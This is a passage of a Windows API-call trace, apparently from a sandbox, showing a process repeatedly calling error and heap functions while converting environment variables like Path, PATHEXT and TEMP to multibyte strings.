GetLastError () returned 0x0 [0097.209] SetLastError (dwErrCode=0x0) [0097.209] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x2c [0097.210] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x30) returned 0x6116f0 [0097.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0097.210] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x19) returned 0x60eba8 [0097.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x60eba8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 25 [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.210] GetLastError () returned 0x0 [0097.210] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.211] GetLastError () returned 0x0 [0097.211] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x30 [0097.212] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x34) returned 0x6116f0 [0097.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.212] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x17) returned 0x611730 [0097.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x611730, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.212] GetLastError () returned 0x0 [0097.212] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.213] SetLastError (dwErrCode=0x0) [0097.213] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x34 [0097.214] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x38) returned 0x6116f0 [0097.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0097.214] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe) returned 0x603238 [0097.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x603238, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.214] SetLastError (dwErrCode=0x0) [0097.214] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.215] SetLastError (dwErrCode=0x0) [0097.215] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] GetLastError () returned 0x0 [0097.216] SetLastError (dwErrCode=0x0) [0097.216] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x6116f0) returned 0x38 [0097.216] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6116f0, Size=0x3c) returned 0x611750 [0097.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 149 [0097.216] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x95) returned 0x611798 [0097.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x611798, cbMultiByte=149, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 149 [0097.217] GetLastError () returned 0x0 [0097.217] SetLastError (dwErrCode=0x0) [0097.217] GetLastError () returned 0x0 [0097.217] SetLastError (dwErrCode=0x0) [0097.217] GetLastError () returned 0x0 [0097.217] SetLastError (dwErrCode=0x0) [0097.217] GetLastError () returned 0x0 [0097.217] SetLastError (dwErrCode=0x0) [0097.217] GetLastError () returned 0x0 [0097.217] SetLastError (dwErrCode=0x0) [0097.217] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.218] GetLastError () returned 0x0 [0097.218] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] GetLastError () returned 0x0 [0097.219] SetLastError (dwErrCode=0x0) [0097.219] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x611750) returned 0x3c [0097.219] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611750, Size=0x40) returned 0x611750 [0097.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0097.220] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x3e) returned 0x6025b0 [0097.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x6025b0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.220] SetLastError (dwErrCode=0x0) [0097.220] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] SetLastError (dwErrCode=0x0) [0097.221] GetLastError () returned 0x0 [0097.221] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611750, Size=0x44) returned 0x611838 [0097.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0097.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1b) returned 0x60ebd0 [0097.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x60ebd0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0097.221] GetLastError () returned 0x0 [0097.221] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x48) returned 0x611838 [0097.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0097.221] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1d) returned 0x60ebf8 [0097.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x60ebf8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0097.221] GetLastError () returned 0x0 [0097.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x4c) returned 0x611838 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0097.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x48) returned 0x606e90 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x606e90, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0097.222] GetLastError () returned 0x0 [0097.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x50) returned 0x611838 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0097.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x6116f0 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x6116f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0097.222] GetLastError () returned 0x0 [0097.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x54) returned 0x611838 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0097.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x18) returned 0x611710 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x611710, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0097.222] GetLastError () returned 0x0 [0097.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x58) returned 0x611838 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0097.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1b) returned 0x60ec20 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x60ec20, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0097.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x5c) returned 0x611838 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0097.222] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x24) returned 0x60adc0 [0097.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x60adc0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0097.222] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x60) returned 0x611838 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0097.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x29) returned 0x60b4d0 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x60b4d0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0097.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x64) returned 0x611838 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x1e) returned 0x60ec48 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x60ec48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0097.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x68) returned 0x611838 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 107 [0097.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x6b) returned 0x6118a8 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", cchWideChar=-1, lpMultiByteStr=0x6118a8, cbMultiByte=107, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpUsedDefaultChar=0x0) returned 107 [0097.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611838, Size=0x6c) returned 0x611920 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0097.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x17) returned 0x611750 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x611750, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0097.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x70) returned 0x611920 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0097.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xf) returned 0x603250 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x603250, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0097.223] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x74) returned 0x611920 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0097.223] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x16) returned 0x611770 [0097.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x611770, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0097.224] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x611920, Size=0x78) returned 0x611920 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0097.224] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2a) returned 0x60b508 [0097.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x60b508, 